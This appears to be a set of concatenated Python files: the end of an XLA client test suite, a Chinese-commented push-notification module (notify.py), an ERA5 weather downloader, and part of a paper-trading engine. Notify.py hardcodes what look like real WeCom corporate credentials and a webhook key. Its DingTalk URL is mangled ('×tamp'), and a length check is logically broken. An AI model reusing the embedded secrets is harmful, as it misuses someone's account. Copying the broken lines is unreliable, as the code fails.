computation_to_apply=self._CreateBinaryAddF32Computation(),
window_dimensions=(2, 1),
window_strides=(1, 1),
padding=xla_client.PaddingType.SAME)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.], [4., 5., 6.]])
def testReduceWindowValidGeneralStridesF32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
window_dimensions=(2, 1),
window_strides=(1, 2),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 9.]])
def testReduceWindowValidUnitStridesF64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
window_dimensions=(2, 1),
window_strides=(1, 1),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.]])
def testReduceWindowSameUnitStridesF64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
window_dimensions=(2, 1),
window_strides=(1, 1),
padding=xla_client.PaddingType.SAME)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.], [4., 5., 6.]])
def testReduceWindowValidGeneralStridesF64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
window_dimensions=(2, 1),
window_strides=(1, 2),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 9.]])
def testWhileF32(self):
cond = self._CreateTestF32Lt10Computation()
body = self._CreateMulF32By2Computation()
c = self._NewComputation()
init = c.ConstantF32Scalar(1.)
c.While(cond, body, init)
self._ExecuteAndCompareClose(c, expected=16.)
def testWhileF64(self):
cond = self._CreateTestF64Lt10Computation()
body = self._CreateMulF64By2Computation()
c = self._NewComputation()
init = c.ConstantF64Scalar(1.)
c.While(cond, body, init)
self._ExecuteAndCompareClose(c, expected=16.)
def testConditionalTrue(self):
c = self._NewComputation()
pred = c.ConstantPredScalar(True)
true_operand = c.ConstantF32Scalar(3.)
true_computation = self._CreateMulF32By2Computation()
false_operand = c.ConstantF32Scalar(2.)
false_computation = self._CreateConstantF32Computation()
c.Conditional(pred, true_operand, true_computation, false_operand,
false_computation)
self._ExecuteAndCompareClose(c, expected=6.)
def testConditionalFalse(self):
c = self._NewComputation()
pred = c.ConstantPredScalar(False)
true_operand = c.ConstantF32Scalar(3.)
true_computation = self._CreateMulF32By2Computation()
false_operand = c.ConstantF32Scalar(2.)
false_computation = self._CreateConstantF32Computation()
c.Conditional(pred, true_operand, true_computation, false_operand,
false_computation)
self._ExecuteAndCompareClose(c, expected=1.)
def testInfeedS32Values(self):
to_infeed = NumpyArrayS32([1, 2, 3, 4])
c = self._NewComputation()
c.GetTupleElement(c.Infeed(xla_client.shape_from_pyval(to_infeed[0])), 0)
compiled_c = c.Build().Compile()
for item in to_infeed:
xla_client.transfer_to_infeed(item)
for item in to_infeed:
result = xla_client.execute_with_python_values(compiled_c)
self.assertEqual(result, item)
def testInfeedTuple(self):
to_infeed = (NumpyArrayS32([1, 2, 3, 4]), NumpyArrayS32([[7], [8]]))
c = self._NewComputation()
c.GetTupleElement(c.Infeed(xla_client.shape_from_pyval(to_infeed)), 0)
compiled_c = c.Build().Compile()
xla_client.transfer_to_infeed(to_infeed)
result = xla_client.execute_with_python_values(compiled_c)
np.testing.assert_equal(result[0], to_infeed[0])
np.testing.assert_equal(result[1], to_infeed[1])
def testInfeedThenOutfeedS32(self):
to_round_trip = NumpyArrayS32([1, 2, 3, 4])
c = self._NewComputation()
x_and_token = c.Infeed(xla_client.shape_from_pyval(to_round_trip[0]))
x = c.GetTupleElement(x_and_token, 0)
token = c.GetTupleElement(x_and_token, 1)
c.Outfeed(x, token)
compiled_c = c.Build().Compile()
for want in to_round_trip:
execution = threading.Thread(target=lambda: compiled_c.Execute([]))
execution.start()
xla_client.transfer_to_infeed(want)
got = xla_client.transfer_from_outfeed(
xla_client.shape_from_pyval(to_round_trip[0]))
execution.join()
self.assertEqual(want, got)
def testScatter(self):
a = np.arange(9).astype(np.int32).reshape((3, 3))
scatter_indices = np.array([0, 2], dtype=np.int32)
updates = np.array([[10, 20, 30], [70, 80, 90]], dtype=np.int32)
dnums = xla_client.ScatterDimensionNumbers()
dnums.update_window_dims.append(1)
dnums.inserted_window_dims.append(0)
dnums.scatter_dims_to_operand_dims.append(0)
dnums.index_vector_dim = 1
c = self._NewComputation()
c.Scatter(
c.Constant(a), c.Constant(scatter_indices), c.Constant(updates),
self._CreateBinaryAddS32Computation(), dnums)
expected = np.array([[10, 21, 32], [3, 4, 5], [76, 87, 98]], dtype=np.int32)
self._ExecuteAndCompareClose(c, expected=expected)
class ErrorTest(ComputationTest):
def setUp(self):
self.f32_scalar_2 = NumpyArrayF32(2.0)
self.s32_scalar_2 = NumpyArrayS32(2)
def testCompileWithWrongElementTypeInLayout(self):
c = self._NewComputation()
c.SetOpMetadata(xla_client.CurrentSourceInfoMetadata())
c.ParameterFromNumpy(self.s32_scalar_2)
c.ClearOpMetadata()
options = xla_client.CompileOptions()
options.argument_layouts = [
xla_client.Shape.array_shape(np.dtype(np.float32), [])
]
def TestFun():
return c.Build().Compile(compile_options=options)
self.assertRaisesRegexp(
RuntimeError, r".*Invalid argument shape.*"
r"expected s32\[\], got f32\[\].*", TestFun)
def testInvokeWithWrongElementType(self):
c = self._NewComputation()
c.SetOpMetadata(xla_client.CurrentSourceInfoMetadata())
c.ParameterFromNumpy(self.s32_scalar_2)
c.ClearOpMetadata()
def TestFun():
return xla_client.execute_with_python_values(c.Build().Compile(),
[self.f32_scalar_2])
self.assertRaisesRegexp(
RuntimeError, r"Invalid argument: Argument does not match.*"
r"want s32\[\], got f32\[\].*", TestFun)
class ComputationRootTest(ComputationTest):
"""Tests related to setting the root of the computation."""
def testComputationRootDifferentFromLastOp(self):
c = self._NewComputation()
x = c.ParameterFromNumpy(NumpyArrayF32(2.0))
result = c.Add(x, c.ConstantF32Scalar(3.14))
extra = c.Add(result, c.ConstantF32Scalar(1.618)) # pylint: disable=unused-variable
arg = NumpyArrayF32(1.0)
compiled_c = c.Build(result).Compile()
ans = xla_client.execute_with_python_values(compiled_c, [arg])
np.testing.assert_allclose(ans, 4.14)
class SetShardingTest(ComputationTest):
"""Tests related to set OpSharding."""
def testSetSharding(self):
c = self._NewComputation()
sharding = xla_client.OpSharding()
sharding.type = sharding.type.REPLICATED
sharding.tile_assignment_dimensions.extend([1])
sharding.tile_assignment_devices.extend([0])
# Set Sharding.
c.SetSharding(sharding)
x = c.ParameterFromNumpy(NumpyArrayF32(2.0))
# Clear Sharding.
c.ClearSharding()
result = c.Add(x, c.ConstantF32Scalar(3.14))
extra = c.Add(result, c.ConstantF32Scalar(1.618)) # pylint: disable=unused-variable
arg = NumpyArrayF32(1.0)
compiled_c = c.Build(result).Compile()
ans = xla_client.execute_with_python_values(compiled_c, [arg])
np.testing.assert_allclose(ans, 4.14)
if __name__ == "__main__":
absltest.main()
|
notify.py
|
#!/usr/bin/env python3
# _*_ coding:utf-8 _*_
import base64
import hashlib
import hmac
import json
import os
import re
import threading
import time
import urllib.parse
import requests
# 原先的 print 函数和主线程的锁
_print = print
mutex = threading.Lock()
# 定义新的 print 函数
def print(text, *args, **kw):
"""
使输出有序进行,不出现多线程同一时间输出导致错乱的问题。
"""
with mutex:
_print(text, *args, **kw)
# 通知服务
# fmt: off
push_config = {
'HITOKOTO': False, # 启用一言(随机句子)
'BARK_PUSH': '', # 必填 bark IP 或设备码,例:https://api.day.app/DxHcxxxxxRxxxxxxcm/
'BARK_ARCHIVE': '', # bark 推送是否存档
'BARK_GROUP': '', # bark 推送分组
'BARK_SOUND': '', # bark 推送声音
'BARK_ICON': '', # bark 推送图标
'CONSOLE': False, # 控制台输出
'DD_BOT_SECRET': '', # 必填 钉钉机器人的 DD_BOT_SECRET
'DD_BOT_TOKEN': '', # 必填 钉钉机器人的 DD_BOT_TOKEN
'FSKEY': '', # 必填 飞书机器人的 FSKEY
'GOBOT_URL': '', # 必填 go-cqhttp
# 推送到个人QQ:http://127.0.0.1/send_private_msg
# 群:http://127.0.0.1/send_group_msg
'GOBOT_QQ': '', # 必填 go-cqhttp 的推送群或用户
# GOBOT_URL 设置 /send_private_msg 时填入 user_id=个人QQ
# /send_group_msg 时填入 group_id=QQ群
'GOBOT_TOKEN': '', # 必填 go-cqhttp 的 access_token
'GOTIFY_URL': '', # 必填 gotify地址,如https://push.example.de:8080
'GOTIFY_TOKEN': '', # 必填 gotify的消息应用token
'GOTIFY_PRIORITY': 0, # 推送消息优先级,默认为0
'IGOT_PUSH_KEY': '', # iGot 聚合推送的 IGOT_PUSH_KEY
'PUSH_KEY': '', # server 酱的 PUSH_KEY,兼容旧版与 Turbo 版
'PUSH_PLUS_TOKEN': '', # 必填 push+ 微信推送的用户令牌
'PUSH_PLUS_USER': '', # push+ 微信推送的群组编码
'QMSG_KEY': '', # qmsg 酱的 QMSG_KEY
'QMSG_TYPE': '', # qmsg 酱的 QMSG_TYPE
'QYWX_AM': 'ww8a8648d68b7891f6,NGapOO7wq_4tjy1GB0ibv94yFkvpwsEun3H-dupZvto,@all,1000001',# corpid,corpsecret,touser(注:多个成员ID使用|隔开),agentid,消息类型(选填,不填默认文本消息类型) 注意用,号隔开(英文输入法的逗号),例如:wwcfrs,B-76WERQ,qinglong,1000001,2COat
'QYWX_KEY': '454589e4-1e3d-4e33-9e46-8877e2f729b5', # 企业微信机器人
'TG_BOT_TOKEN': '', # 必填 tg 机器人的 TG_BOT_TOKEN,例:1407203283:AAG9rt-6RDaaX0HBLZQq0laNOh898iFYaRQ
'TG_USER_ID': '', # 必填 tg 机器人的 TG_USER_ID,例:1434078534
'TG_API_HOST': '', # tg 代理 api
'TG_PROXY_AUTH': '', # tg 代理认证参数
'TG_PROXY_HOST': '', # tg 机器人的 TG_PROXY_HOST
'TG_PROXY_PORT': '', # tg 机器人的 TG_PROXY_PORT
}
notify_function = []
# fmt: on
# 首先读取 面板变量 或者 github action 运行变量
for k in push_config:
if os.getenv(k):
v = os.getenv(k)
push_config[k] = v
def bark(title: str, content: str) -> None:
"""
使用 bark 推送消息。
"""
if not push_config.get("BARK_PUSH"):
print("bark 服务的 BARK_PUSH 未设置!!\n取消推送")
return
print("bark 服务启动")
if push_config.get("BARK_PUSH").startswith("http"):
url = f'{push_config.get("BARK_PUSH")}/{urllib.parse.quote_plus(title)}/{urllib.parse.quote_plus(content)}'
else:
url = f'https://api.day.app/{push_config.get("BARK_PUSH")}/{urllib.parse.quote_plus(title)}/{urllib.parse.quote_plus(content)}'
bark_params = {
"BARK_ARCHIVE": "isArchive",
"BARK_GROUP": "group",
"BARK_SOUND": "sound",
"BARK_ICON": "icon",
}
params = ""
for pair in filter(
lambda pairs: pairs[0].startswith("BARK_")
and pairs[0] != "BARK_PUSH"
and pairs[1]
and bark_params.get(pairs[0]),
push_config.items(),
):
params += f"{bark_params.get(pair[0])}={pair[1]}&"
if params:
url = url + "?" + params.rstrip("&")
response = requests.get(url).json()
if response["code"] == 200:
print("bark 推送成功!")
else:
print("bark 推送失败!")
def console(title: str, content: str) -> None:
"""
使用 控制台 推送消息。
"""
print(f"{title}\n\n{content}")
def dingding_bot(title: str, content: str) -> None:
"""
使用 钉钉机器人 推送消息。
"""
if not push_config.get("DD_BOT_SECRET") or not push_config.get("DD_BOT_TOKEN"):
print("钉钉机器人 服务的 DD_BOT_SECRET 或者 DD_BOT_TOKEN 未设置!!\n取消推送")
return
print("钉钉机器人 服务启动")
timestamp = str(round(time.time() * 1000))
secret_enc = push_config.get("DD_BOT_SECRET").encode("utf-8")
string_to_sign = "{}\n{}".format(timestamp, push_config.get("DD_BOT_SECRET"))
string_to_sign_enc = string_to_sign.encode("utf-8")
hmac_code = hmac.new(
secret_enc, string_to_sign_enc, digestmod=hashlib.sha256
).digest()
sign = urllib.parse.quote_plus(base64.b64encode(hmac_code))
url = f'https://oapi.dingtalk.com/robot/send?access_token={push_config.get("DD_BOT_TOKEN")}×tamp={timestamp}&sign={sign}'
headers = {"Content-Type": "application/json;charset=utf-8"}
data = {"msgtype": "text", "text": {"content": f"{title}\n\n{content}"}}
response = requests.post(
url=url, data=json.dumps(data), headers=headers, timeout=15
).json()
if not response["errcode"]:
print("钉钉机器人 推送成功!")
else:
print("钉钉机器人 推送失败!")
def feishu_bot(title: str, content: str) -> None:
"""
使用 飞书机器人 推送消息。
"""
if not push_config.get("FSKEY"):
print("飞书 服务的 FSKEY 未设置!!\n取消推送")
return
print("飞书 服务启动")
url = f'https://open.feishu.cn/open-apis/bot/v2/hook/{push_config.get("FSKEY")}'
data = {"msg_type": "text", "content": {"text": f"{title}\n\n{content}"}}
response = requests.post(url, data=json.dumps(data)).json()
if response.get("StatusCode") == 0:
print("飞书 推送成功!")
else:
print("飞书 推送失败!错误信息如下:\n", response)
def go_cqhttp(title: str, content: str) -> None:
"""
使用 go_cqhttp 推送消息。
"""
if not push_config.get("GOBOT_URL") or not push_config.get("GOBOT_QQ"):
print("go-cqhttp 服务的 GOBOT_URL 或 GOBOT_QQ 未设置!!\n取消推送")
return
print("go-cqhttp 服务启动")
url = f'{push_config.get("GOBOT_URL")}?access_token={push_config.get("GOBOT_TOKEN")}&{push_config.get("GOBOT_QQ")}&message=标题:{title}\n内容:{content}'
response = requests.get(url).json()
if response["status"] == "ok":
print("go-cqhttp 推送成功!")
else:
print("go-cqhttp 推送失败!")
def gotify(title:str,content:str) -> None:
"""
使用 gotify 推送消息。
"""
if not push_config.get("GOTIFY_URL") or not push_config.get("GOTIFY_TOKEN"):
print("gotify 服务的 GOTIFY_URL 或 GOTIFY_TOKEN 未设置!!\n取消推送")
return
print("gotify 服务启动")
url = f'{push_config.get("GOTIFY_URL")}/message?token={push_config.get("GOTIFY_TOKEN")}'
data = {"title": title,"message": content,"priority": push_config.get("GOTIFY_PRIORITY")}
response = requests.post(url,data=data).json()
if response.get("id"):
print("gotify 推送成功!")
else:
print("gotify 推送失败!")
def iGot(title: str, content: str) -> None:
"""
使用 iGot 推送消息。
"""
if not push_config.get("IGOT_PUSH_KEY"):
print("iGot 服务的 IGOT_PUSH_KEY 未设置!!\n取消推送")
return
print("iGot 服务启动")
url = f'https://push.hellyw.com/{push_config.get("IGOT_PUSH_KEY")}'
data = {"title": title, "content": content}
headers = {"Content-Type": "application/x-www-form-urlencoded"}
response = requests.post(url, data=data, headers=headers).json()
if response["ret"] == 0:
print("iGot 推送成功!")
else:
print(f'iGot 推送失败!{response["errMsg"]}')
def serverJ(title: str, content: str) -> None:
"""
通过 serverJ 推送消息。
"""
if not push_config.get("PUSH_KEY"):
print("serverJ 服务的 PUSH_KEY 未设置!!\n取消推送")
return
print("serverJ 服务启动")
data = {"text": title, "desp": content.replace("\n", "\n\n")}
if push_config.get("PUSH_KEY").index("SCT") != -1:
url = f'https://sctapi.ftqq.com/{push_config.get("PUSH_KEY")}.send'
else:
url = f'https://sc.ftqq.com/${push_config.get("PUSH_KEY")}.send'
response = requests.post(url, data=data).json()
if response.get("errno") == 0 or response.get("code") == 0:
print("serverJ 推送成功!")
else:
print(f'serverJ 推送失败!错误码:{response["message"]}')
def pushplus_bot(title: str, content: str) -> None:
"""
通过 push+ 推送消息。
"""
if not push_config.get("PUSH_PLUS_TOKEN"):
print("PUSHPLUS 服务的 PUSH_PLUS_TOKEN 未设置!!\n取消推送")
return
print("PUSHPLUS 服务启动")
url = "http://www.pushplus.plus/send"
data = {
"token": push_config.get("PUSH_PLUS_TOKEN"),
"title": title,
"content": content,
"topic": push_config.get("PUSH_PLUS_USER"),
}
body = json.dumps(data).encode(encoding="utf-8")
headers = {"Content-Type": "application/json"}
response = requests.post(url=url, data=body, headers=headers).json()
if response["code"] == 200:
print("PUSHPLUS 推送成功!")
else:
url_old = "http://pushplus.hxtrip.com/send"
headers["Accept"] = "application/json"
response = requests.post(url=url_old, data=body, headers=headers).json()
if response["code"] == 200:
print("PUSHPLUS(hxtrip) 推送成功!")
else:
print("PUSHPLUS 推送失败!")
def qmsg_bot(title: str, content: str) -> None:
"""
使用 qmsg 推送消息。
"""
if not push_config.get("QMSG_KEY") or not push_config.get("QMSG_TYPE"):
print("qmsg 的 QMSG_KEY 或者 QMSG_TYPE 未设置!!\n取消推送")
return
print("qmsg 服务启动")
url = f'https://qmsg.zendee.cn/{push_config.get("QMSG_TYPE")}/{push_config.get("QMSG_KEY")}'
payload = {"msg": f'{title}\n\n{content.replace("----", "-")}'.encode("utf-8")}
response = requests.post(url=url, params=payload).json()
if response["code"] == 0:
print("qmsg 推送成功!")
else:
print(f'qmsg 推送失败!{response["reason"]}')
def wecom_app(title: str, content: str) -> None:
"""
通过 企业微信 APP 推送消息。
"""
if not push_config.get("QYWX_AM"):
print("QYWX_AM 未设置!!\n取消推送")
return
QYWX_AM_AY = re.split(",", push_config.get("QYWX_AM"))
if 4 < len(QYWX_AM_AY) > 5:
print("QYWX_AM 设置错误!!\n取消推送")
return
print("企业微信 APP 服务启动")
corpid = QYWX_AM_AY[0]
corpsecret = QYWX_AM_AY[1]
touser = QYWX_AM_AY[2]
agentid = QYWX_AM_AY[3]
try:
media_id = QYWX_AM_AY[4]
except IndexError:
media_id = ""
wx = WeCom(corpid, corpsecret, agentid)
# 如果没有配置 media_id 默认就以 text 方式发送
if not media_id:
message = title + "\n" + content
response = wx.send_text(message, touser)
else:
response = wx.send_mpnews(title, content, media_id, touser)
if response == "ok":
print("企业微信推送成功!")
else:
print("企业微信推送失败!错误信息如下:\n", response)
class WeCom:
def __init__(self, corpid, corpsecret, agentid):
self.CORPID = corpid
self.CORPSECRET = corpsecret
self.AGENTID = agentid
def get_access_token(self):
url = "https://qyapi.weixin.qq.com/cgi-bin/gettoken"
values = {
"corpid": self.CORPID,
"corpsecret": self.CORPSECRET,
}
req = requests.post(url, params=values)
data = json.loads(req.text)
return data["access_token"]
def send_text(self, message, touser="@all"):
send_url = (
"https://qyapi.weixin.qq.com/cgi-bin/message/send?access_token="
+ self.get_access_token()
)
send_values = {
"touser": touser,
"msgtype": "text",
"agentid": self.AGENTID,
"text": {"content": message},
"safe": "0",
}
send_msges = bytes(json.dumps(send_values), "utf-8")
respone = requests.post(send_url, send_msges)
respone = respone.json()
return respone["errmsg"]
def send_mpnews(self, title, message, media_id, touser="@all"):
send_url = (
"https://qyapi.weixin.qq.com/cgi-bin/message/send?access_token="
+ self.get_access_token()
)
send_values = {
"touser": touser,
"msgtype": "mpnews",
"agentid": self.AGENTID,
"mpnews": {
"articles": [
{
"title": title,
"thumb_media_id": media_id,
"author": "Author",
"content_source_url": "",
"content": message.replace("\n", "<br/>"),
"digest": message,
}
]
},
}
send_msges = bytes(json.dumps(send_values), "utf-8")
respone = requests.post(send_url, send_msges)
respone = respone.json()
return respone["errmsg"]
def wecom_bot(title: str, content: str) -> None:
"""
通过 企业微信机器人 推送消息。
"""
if not push_config.get("QYWX_KEY"):
print("企业微信机器人 服务的 QYWX_KEY 未设置!!\n取消推送")
return
print("企业微信机器人服务启动")
url = f"https://qyapi.weixin.qq.com/cgi-bin/webhook/send?key={push_config.get('QYWX_KEY')}"
headers = {"Content-Type": "application/json;charset=utf-8"}
data = {"msgtype": "text", "text": {"content": f"{title}\n\n{content}"}}
response = requests.post(
url=url, data=json.dumps(data), headers=headers, timeout=15
).json()
if response["errcode"] == 0:
print("企业微信机器人推送成功!")
else:
print("企业微信机器人推送失败!")
def telegram_bot(title: str, content: str) -> None:
"""
使用 telegram 机器人 推送消息。
"""
if not push_config.get("TG_BOT_TOKEN") or not push_config.get("TG_USER_ID"):
print("tg 服务的 bot_token 或者 user_id 未设置!!\n取消推送")
return
print("tg 服务启动")
if push_config.get("TG_API_HOST"):
url = f"https://{push_config.get('TG_API_HOST')}/bot{push_config.get('TG_BOT_TOKEN')}/sendMessage"
else:
url = (
f"https://api.telegram.org/bot{push_config.get('TG_BOT_TOKEN')}/sendMessage"
)
headers = {"Content-Type": "application/x-www-form-urlencoded"}
payload = {
"chat_id": str(push_config.get("TG_USER_ID")),
"text": f"{title}\n\n{content}",
"disable_web_page_preview": "true",
}
proxies = None
if push_config.get("TG_PROXY_HOST") and push_config.get("TG_PROXY_PORT"):
if push_config.get("TG_PROXY_AUTH") is not None and "@" not in push_config.get(
"TG_PROXY_HOST"
):
push_config["TG_PROXY_HOST"] = (
push_config.get("TG_PROXY_AUTH")
+ "@"
+ push_config.get("TG_PROXY_HOST")
)
proxyStr = "http://{}:{}".format(
push_config.get("TG_PROXY_HOST"), push_config.get("TG_PROXY_PORT")
)
proxies = {"http": proxyStr, "https": proxyStr}
response = requests.post(
url=url, headers=headers, params=payload, proxies=proxies
).json()
if response["ok"]:
print("tg 推送成功!")
else:
print("tg 推送失败!")
def one() -> str:
"""
获取一条一言。
:return:
"""
url = "https://v1.hitokoto.cn/"
res = requests.get(url).json()
return res["hitokoto"] + " ----" + res["from"]
if push_config.get("BARK_PUSH"):
notify_function.append(bark)
if push_config.get("CONSOLE"):
notify_function.append(console)
if push_config.get("DD_BOT_TOKEN") and push_config.get("DD_BOT_SECRET"):
notify_function.append(dingding_bot)
if push_config.get("FSKEY"):
notify_function.append(feishu_bot)
if push_config.get("GOBOT_URL") and push_config.get("GOBOT_QQ"):
notify_function.append(go_cqhttp)
if push_config.get("GOTIFY_URL") and push_config.get("GOTIFY_TOKEN"):
notify_function.append(gotify)
if push_config.get("IGOT_PUSH_KEY"):
notify_function.append(iGot)
if push_config.get("PUSH_KEY"):
notify_function.append(serverJ)
if push_config.get("PUSH_PLUS_TOKEN"):
notify_function.append(pushplus_bot)
if push_config.get("QMSG_KEY") and push_config.get("QMSG_TYPE"):
notify_function.append(qmsg_bot)
if push_config.get("QYWX_AM"):
notify_function.append(wecom_app)
if push_config.get("QYWX_KEY"):
notify_function.append(wecom_bot)
if push_config.get("TG_BOT_TOKEN") and push_config.get("TG_USER_ID"):
notify_function.append(telegram_bot)
def send(title: str, content: str) -> None:
if not content:
print(f"{title} 推送内容为空!")
return
hitokoto = push_config.get("HITOKOTO")
text = one() if hitokoto else ""
content += "\n" + text
ts = [
threading.Thread(target=mode, args=(title, content), name=mode.__name__)
for mode in notify_function
]
[t.start() for t in ts]
[t.join() for t in ts]
def main():
send("title", "content")
if __name__ == "__main__":
main()
|
ecmwf_era5_request.py
|
#!/usr/bin/python3
"""
This module provides functionality to download the needed weather data
"""
from gisme import (era5_path, lon_min, lon_max, lat_min, lat_max)
import os
import cdsapi
import urllib3
import threading
# to suppress InsecureRequestWarning thrown when using mobile network or some sorts of networks
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def retrieve_year():
while True:
# if list with pairs of year and list of months is empty, exit loop
if not yms:
print('list is empty')
break
year, month = yms.pop()
# set up paths
ncfile = f'ERA5_RSL_{year}{month}.nc'
file_path = era5_path+ncfile
# check if file already exists, if so, continue with next file
if os.path.exists(file_path):
print(f'{ncfile} already exists')
continue
try:
client.retrieve(
'reanalysis-era5-single-levels',
{
'product_type': 'reanalysis',
'variable': [
'10m_u_component_of_wind', '10m_v_component_of_wind', '2m_temperature',
'leaf_area_index_high_vegetation', 'leaf_area_index_low_vegetation', 'low_cloud_cover',
'soil_temperature_level_1', 'surface_latent_heat_flux', 'surface_net_thermal_radiation',
'surface_sensible_heat_flux', 'total_cloud_cover', 'total_column_rain_water',
'total_sky_direct_solar_radiation_at_surface'
],
'year': [
str(year)
],
'month': [
month
],
'day': [
'01', '02', '03',
'04', '05', '06',
'07', '08', '09',
'10', '11', '12',
'13', '14', '15',
'16', '17', '18',
'19', '20', '21',
'22', '23', '24',
'25', '26', '27',
'28', '29', '30',
'31'
],
'area': [
lat_max, lon_min, lat_min, lon_max # N, W, S, E
],
'grid': [
0.25, 0.25
],
'time': [
'00:00', '02:00', '04:00',
'06:00', '08:00', '10:00',
'12:00', '14:00', '16:00',
'18:00', '20:00', '22:00'
],
'format': 'netcdf'
},
f'{era5_path}{ncfile}')
except:
print(f'download not available for {year} in month {month}')
def download_ecmwf_data():
# create folder to store data if it does not exist yet
if not os.path.exists(era5_path):
os.makedirs(era5_path)
###################
# retrieving data #
###################
# may be used too, but actually 10 is a good number as copernicus allows up to 10 threads
# num_threads = os.cpu_count()
threads = []
for i in range(10):
t = threading.Thread(target=retrieve_year)
t.start()
threads.append(t)
for t in threads:
t.join()
######################################
# uncomment the following section to #
# download weather data from ecmwf #
######################################
client = cdsapi.Client()
"""
yms is a list of tuples, each tuple containing a year and a month;
the data is split into single months, because the size of files
that are downloaded is limited by copernicus
"""
years = range(2015, 2019)
months = ['01', '02', '03', '04', '05', '06', '07', '08', '09', '10', '11', '12']
yms = []
for year in years:
for month in months:
yms.append((str(year), month))
download_ecmwf_data()
|
pt_engine.py
|
import logging
import smtplib
from abc import ABC
from queue import Empty, Queue
from threading import Thread
from email.message import EmailMessage
from ..event import EventEngine, Event
from ..api.db import MongoDBService
from ..api.pytdx_api import PYTDXService
from ..utility.setting import SETTINGS
from ..utility.model import LogData
from ..utility.event import EVENT_LOG, EVENT_ERROR, EVENT_MARKET_CLOSE
from paper_trading.utility.constant import PersistanceMode
from paper_trading.trade.market import ChinaAMarket
from paper_trading.trade.account_engine import AccountEngine
class MainEngine:
"""模拟交易主引擎"""
def __init__(self, event_engine: EventEngine = None, market=None, param: dict = None):
# 绑定事件引擎
if not event_engine:
self.event_engine = EventEngine()
else:
self.event_engine = event_engine
self.event_engine.start()
self._settings = SETTINGS # 配置参数
self.__active = False # 主引擎状态
self.pst_active = None # 数据持久化开关
self._market = market # 交易市场
self.account_engine = None # 账户引擎
self.order_put = None # 订单回调函数
# 更新参数
self._settings.update(param)
# 开启日志引擎
log = LogEngine(self.event_engine)
log.register_event()
# 开启邮件引擎
# self.email = EmailEngine(self.event_engine)
# self.email.start()
# 市场模拟交易线程
self._thread = Thread(target=self._run)
# 注册事件监听
self.event_register()
self.write_log("模拟交易主引擎:初始化完毕")
def event_register(self):
"""注册事件监听"""
self.event_engine.register(EVENT_ERROR, self.process_error_event)
self.event_engine.register(EVENT_MARKET_CLOSE, self.process_market_close)
def start(self):
"""引擎初始化"""
self.write_log("模拟交易主引擎:启动")
# 引擎工作参数检查
self._param_check()
# 持久化配置
if self._settings["PERSISTENCE_MODE"] == PersistanceMode.REALTIME:
self.pst_active = True
elif self._settings["PERSISTENCE_MODE"] == PersistanceMode.MANUAL:
self.pst_active = False
else:
raise ValueError("持久化参数错误")
# 连接数据库
db = self.creat_db()
# 连接行情
hq_client = self.creat_hq_api()
# 账户引擎启动
self.account_engine = AccountEngine(self.event_engine, self.pst_active, self._settings["LOAD_DATA_MODE"], db)
self.account_engine.start()
# 默认使用ChinaAMarket
if not self._market or isinstance(self._market, ChinaAMarket):
self._market = ChinaAMarket(self.event_engine, self.account_engine, hq_client, {})
else:
self._market = self._market(self.event_engine, self.account_engine, hq_client, {})
# 交易市场初始化,并返回订单推送函数
self.order_put = self._market.on_init()
# 启动订单薄撮合程序
self._thread.start()
self.__active = True
return self
def _run(self):
"""订单薄撮合程序启动"""
self._market.on_match()
def _close(self):
"""模拟交易引擎关闭"""
# 关闭市场
self._market._active = False
self._thread.join()
self.__active = False
self.write_log("模拟交易主引擎:关闭")
def _param_check(self):
"""引擎工作参数检查"""
if not self._settings["PERSISTENCE_MODE"]:
raise ValueError("数据持久化参数未配置")
def on_orders_arrived(self, order):
"""订单到达处理"""
if self.__active:
status, msg = self.account_engine.orders_arrived(order)
return status, msg
else:
return False, "交易市场关闭"
def process_market_close(self, event):
"""市场关闭处理"""
market_name = event.data
self.write_log("{}: 交易市场闭市".format(market_name))
self._close()
def process_error_event(self, event):
"""系统错误处理"""
msg = event.data
self.write_log(msg, level=logging.CRITICAL)
# self.email.queue.put(msg)
def creat_db(self):
"""实例化数据库"""
host = self._settings.get("MONGO_HOST", "localhost")
port = self._settings.get("MONGO_PORT", 27017)
db = MongoDBService(host, port)
db.connect_db()
return db
def creat_hq_api(self):
"""实例化行情源"""
tdx = PYTDXService(self.creat_db().db_client)
tdx.connect_api()
return tdx
def write_log(self, msg: str, level: int = logging.INFO):
""""""
log = LogData(log_content=msg, log_level=level)
event = Event(EVENT_LOG, log)
self.event_engine.put(event)
class Singleton(type):
"""
Singleton metaclass,
class A:
__metaclass__ = Singleton
"""
_instances = {}
def __call__(cls, *args, **kwargs):
""""""
if cls not in cls._instances:
cls._instances[cls] = super(Singleton, cls).__call__(*args, **kwargs)
return cls._instances[cls]
class BaseEngine(ABC):
"""
Abstract class for implementing an function engine.
"""
def __init__(
self, event_engine: EventEngine, engine_name: str,
):
""""""
self.event_engine = event_engine
self.engine_name = engine_name
def close(self):
""""""
pass
class LogEngine(BaseEngine):
"""
Processes log event and output with logging module.
"""
__metaclass__ = Singleton
def __init__(self, event_engine: EventEngine):
""""""
super(LogEngine, self).__init__(event_engine, "log")
if not SETTINGS["log.active"]:
return
self.level = SETTINGS["log.level"]
self.logger = logging.getLogger("lazyTrader")
self.logger.setLevel(self.level)
self.formatter = logging.Formatter("%(asctime)s %(levelname)s: %(message)s")
